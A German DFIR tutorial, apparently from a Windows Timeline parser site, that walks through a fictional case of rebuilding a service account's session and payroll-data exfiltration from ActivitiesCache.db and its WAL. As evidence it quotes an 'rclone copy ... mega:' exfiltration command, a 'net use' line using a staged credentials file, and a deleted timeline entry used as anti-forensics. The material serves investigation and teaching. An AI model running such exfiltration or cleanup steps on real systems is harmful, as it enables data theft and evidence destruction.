Windows-Timeline-Ermittlung: ein Exfiltrationsfall
Fiktiver Fall Schritt für Schritt: interaktive Sitzung eines Dienstkontos und Exfiltration von Gehaltsdaten aus ActivitiesCache.db und WAL rekonstruieren.
Kurz gesagt. In diesem fiktiven Fall zeigt die Timeline des Kontos svc_backup auf dem Arbeitsplatz FIN-WKS-07 ein aus Downloads geöffnetes Werkzeugarchiv, eine in Notepad gelesene Datei mit Zugangsdaten, einen net use-Befehl in der Zwischenablage, eine RDP-Sitzung, eine durchsuchte Gehaltsfreigabe, eine aus E:\exfil geöffnete Excel-Datei, fünf Minuten Fokus in rclone.exe aus C:\Users\Public, einen Befehl rclone copy ... mega: in der Zwischenablage und eine anstehende Löschung des Notepad-Eintrags. Die letzten fünf Punkte existieren nur im WAL.
Hinweis: fiktives Szenario. Alles Folgende ist erfunden: Organisation, Rechner, Konto, Dateien und Uhrzeiten. Es entspricht der Datenbank hinter „Beispiel testen“ auf der Startseite des Windows Timeline Parser, sodass Sie mit denselben Zeilen mitverfolgen können. Die Geschichte setzt den
svc_backup-Angriff fort, der auf allen Websites dieser Parser-Familie verwendet wird.
Der Anruf
Montag, 14. September 2026, am Nachmittag. Der Dateiserver der Finanzabteilung, FILESRV01, zeigt am späten Vormittag einen ungewöhnlichen Lesezugriffs-Ausschlag auf \\FILESRV01\Finance\Payroll. Verantwortlich ist das Konto svc_backup, ein Dienstkonto, das sich nie interaktiv anmelden sollte. Der einzige Arbeitsplatz, auf dem es ein Profil hat, ist FIN-WKS-07. Der Rechner läuft noch.
Der Ermittler startet eine Triage-Sammlung mit dem KAPE-Target WindowsTimeline, sodass C:\Users\svc_backup\AppData\Local\ConnectedDevicesPlatform\L.svc_backup\ mit ActivitiesCache.db und ActivitiesCache.db-wal zurückkommt (Sicherungsleitfaden).
Die erste Frage: Hat ein Mensch dieses Konto an der Tastatur benutzt, und was hat er getan?
Erster Durchgang: laden und Zähler lesen
Legt man die ZIP der Sammlung im Werkzeug ab, paart es die Datenbank mit ihrem WAL und ordnet sie über den Pfad Users\svc_backup\ dem Konto svc_backup zu. Keine Warnungen: Das WAL passt, alle Frames sind bestätigt.
Die Zähler sind der erste Befund. Es gibt Aktivitäten aller interessanten Typen, Zwischenablage-Einträge und eine Löschung. Mehrere Zeilen sind als Nur im WAL markiert: Sie wurden nach dem letzten Checkpoint geschrieben. Hätte der Ermittler nur die Datenbank gesichert, gäbe es diese Zeilen nicht.
Die Sitzung, Zeile für Zeile
Die Zeiten sind UTC. Der userTimezone im Payload ist Europe/Paris (an diesem Datum UTC+2), die Uhr des Benutzers zeigte also zwei Stunden mehr.
| UTC | Typ | App | Element | Markierungen |
|---|---|---|---|---|
| 10:02 bis 10:08 | In Verwendung (360 s) | %SystemRoot%\System32\cmd.exe | ||
| 10:06:40 | Geöffnet | %ProgramFiles%\7-Zip\7zFM.exe | C:\Users\svc_backup\Downloads\tools.zip | Vom Benutzer beschreibbarer Ordner |
| 10:10:05 | Geöffnet | Notepad | C:\ProgramData\Intel\creds.txt | Vom Benutzer beschreibbarer Ordner |
| 10:10:05 bis 10:14:05 | In Verwendung (240 s) | Notepad | ||
| 10:12:30 | Zwischenablage | Notepad | net use \\FILESRV01\Finance /user:CORP\svc_backup | Zwischenablage |
| 10:18:40 bis 10:30 | In Verwendung (680 s) | mstsc.exe | ||
| 10:31:07 | Geöffnet | File Explorer | \\FILESRV01\Finance\Payroll | Netzwerkpfad |
| 10:31:07 bis 10:44 | In Verwendung (770 s) | File Explorer | Im WAL geändert | |
| 10:40:12 | Geöffnet | Excel | E:\exfil\finance_2026\Payroll_2026.xlsx | Anderes Laufwerk, Nur im WAL |
| 10:47:02 | Zwischenablage | cmd.exe | rclone copy E:\exfil mega:fin-backup --transfers 8 | Zwischenablage, Nur im WAL |
| 10:47:12 bis 10:52:30 | In Verwendung (318 s) | C:\Users\Public\rclone.exe | Vom Benutzer beschreibbarer Ordner, Nur im WAL | |
| 10:55:20 | Operation: Löschen | Notepad | (die Aktivität zu creds.txt) | Löschung, Nur im WAL |
Gelesen so, wie es der Artikel zum Ausführungsnachweis empfiehlt:
Ein Mensch saß an der Tastatur. Fokuszeit in cmd.exe, Notepad, mstsc.exe, im Explorer und in rclone.exe ist interaktive Nutzung, keine geplante Aufgabe. Ein Dienstkonto mit zwanzig Minuten Vordergrundaktivität ist schon für sich ein Befund.
Die Werkzeuge kamen als Archiv. tools.zip im Downloads-Ordner des Kontos, vier Minuten nach Sitzungsbeginn mit 7-Zip geöffnet. Nächster Schritt: USN-Journal und Prefetch, um zu sehen, was daraus hervorging.
Zugangsdaten wurden in einer Datei bereitgelegt. C:\ProgramData\Intel\creds.txt ist keine Intel-Datei. Vier Minuten Fokus in Notepad, und zwei Minuten später ein net use-Befehl mit dem Kontonamen in der Zwischenablage. Die Zwischenablage-Zeile ist Inhalt vom Typ 10, der nur existiert, weil Zwischenablageverlauf und Synchronisierung auf diesem Rechner eingeschaltet waren (Zwischenablage-Forensik).
Die Freigabe wurde durchsucht, länger als es zunächst aussah. Die Explorer-Fokussitzung im Ordner Payroll zeigt 350 Sekunden in der zurückgeschriebenen Datenbank und 770 Sekunden im WAL. Die Zeile wurde nach dem Checkpoint aktualisiert. Wer nur die Datenbank zitiert, halbiert die Zeit auf der Freigabe.
Was nur das WAL weiß
Alles nach 10:40 steht nur im WAL:
- Excel öffnete
Payroll_2026.xlsxausE:\exfil\finance_2026\: einem zweiten, vermutlich wechselbaren Laufwerk. Timeline liefert den Buchstaben, nicht das Gerät. LNK-Dateien und Jump Lists von Excel enthalten Volume-Informationen; der USB-Verlauf steht in der Registry. rclone.exelief ausC:\Users\Public\, erfasst über eine AppId vom Typx_exe_path(ein eigenständiges Programm, keine installierte App), mit 318 Sekunden Fokus.- Die Zwischenablage enthält den genauen Befehl:
rclone copy E:\exfil mega:fin-backup --transfers 8. Er nennt Quellordner, Ziel (mega:, ein in der rclone-Konfiguration des Benutzers definierter Remote-Name, laut rclone-Dokumentation) und Parallelität. - Um 10:55:20 wurde eine Löschoperation für die Aktivität zu
creds.txtvorgemerkt: Jemand hat diesen Eintrag aus seinem Aktivitätsverlauf entfernt (Anti-Forensik). Die ursprünglicheActivity-Zeile ist noch da, und die Operation selbst ist ein mit Zeitstempel versehener Beleg für den Bereinigungsversuch.
Ohne WAL endet der Bericht bei einem Explorer-Fenster auf einer Freigabe. Mit WAL enthält er den Ablageordner, das Werkzeug, den Befehl und die Bereinigung. Das ist die praktische Bedeutung von warum die -wal-Datei zählt.
Bestätigungsplan
Timeline liefert die Erzählung; jede Aussage braucht dennoch einen zweiten Zeugen.
| Aussage | Belegen mit |
|---|---|
rclone.exe wurde ausgeführt | Prefetch RCLONE.EXE-*.pf, SHA-1 in AmCache |
| Daten sind abgeflossen | Netzwerknutzung von rclone.exe in SRUM, Proxy- oder Firewall-Protokolle |
E: war ein USB-Gerät | USB-Schlüssel in SYSTEM über den Registry-Parser, Volume-Seriennummer in LNK |
| RDP zu welchem Host | Jump List von mstsc, Registry-Schlüssel des Terminal Server Client, Ereignisprotokolle auf dem Ziel |
Inhalt von creds.txt | Die Datei selbst oder ihre Spuren im Papierkorb und im USN-Journal |
| Anmeldetyp des Kontos | Security-Ereignisse 4624 in EVTX |
Was Sie schreiben
Eine belastbare Zusammenfassung für den Bericht:
„Die Aktivitätsverlaufsdatenbank von svc_backup auf FIN-WKS-07 (ActivitiesCache.db mit Write-Ahead-Log, Hashwerte im Anhang) verzeichnet am 14. September 2026 zwischen 10:02 und 10:55 UTC eine interaktive Nutzung des Kontos, darunter das Öffnen von E:\exfil\finance_2026\Payroll_2026.xlsx durch Excel um 10:40:12, 318 Sekunden aktive Nutzung von C:\Users\Public\rclone.exe ab 10:47:12 sowie Zwischenablageinhalt, der zu einer rclone-Kopie auf einen Remote namens mega passt. Diese Datensätze existieren nur im Write-Ahead-Log. Um 10:55:20 wurde die Löschung der Aktivität zu C:\ProgramData\Intel\creds.txt vorgemerkt.“
Danach folgt die ausgefüllte Bestätigungstabelle.
Selbst ausprobieren
Öffnen Sie das Werkzeug, klicken Sie auf Beispiel testen und bilden Sie die Tabelle oben nach: Aktivieren Sie Nur markierte, achten Sie auf die Markierung Nur im WAL und stellen Sie dann den Typfilter auf Ausstehende Operationen. Die Schritt-für-Schritt-Anleitung erklärt jedes Bedienelement.